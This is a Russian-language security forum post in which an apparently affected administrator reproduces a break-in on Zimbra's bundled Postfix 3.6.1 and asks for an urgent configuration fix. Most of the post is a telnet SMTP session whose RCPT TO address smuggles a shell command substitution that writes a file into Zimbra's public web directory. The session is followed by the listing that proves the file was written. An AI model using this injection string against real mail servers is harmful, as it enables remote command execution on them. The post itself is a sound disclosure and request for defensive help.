Профиль: Аноним (вход | регистрация) неRU opennet.me  
The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Инъекция через  RCPT TO: в postfix из комплекта Zimbra."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Обнаружение и предотвращение атак / Linux)
Изначальное сообщение [ Отслеживать ]

"Инъекция через  RCPT TO: в postfix из комплекта Zimbra."  +/
Сообщение от eteveto (ok), 13-Авг-26, 21:32 
Кратко - вот повтор действий взлома

$telnet xxx.ru 25
Trying 999.99.999.999...
Connected to xxx.ru.
Escape character is '^]'.
220 xxx.ru ESMTP Postfix
HELO probe.test
250 xxx.ru
MAIL FROM: test@probe.test
250 2.1.0 Ok
RCPT TO: <"x: Service status change: localhost $(echo atas > mailboxd/webapps/zimbra/public/atas.txt) changed from stopped to running"@probe.test>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
atas
.
250 2.0.0 Ok: queued as 8691A9D04072
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

Это итог.

$ls -l /opt/zimbra/mailboxd/webapps/zimbra/public/atas.txt
-rw-r----- 1 zimbra zimbra 5 Aug 13 20:51 /opt/zimbra/mailboxd/webapps/zimbra/public/atas.txt

Грубо говоря, от пользователя, под которым постфикс, выполняется всё, что в $(). А это много...

Дополнительно не проверял много, но при нескольких других вариантах строки с инъекцией код не исполняется. Вот почему-то именно такой вариант срабатывает.

Возможно вариант обсуждался. Если кто помнит - подскажите ссылку на ветку. Поиском по строчке "$()" я буду искать долго...

Нужен (срочный) совет, что можно на ходу подправить в конфиге постфикса, чтобы эту дырку закрыть. Версия постфикса - 3.6.1. Заранее благодарю.

Ответить | Правка | Cообщить модератору


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2026 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру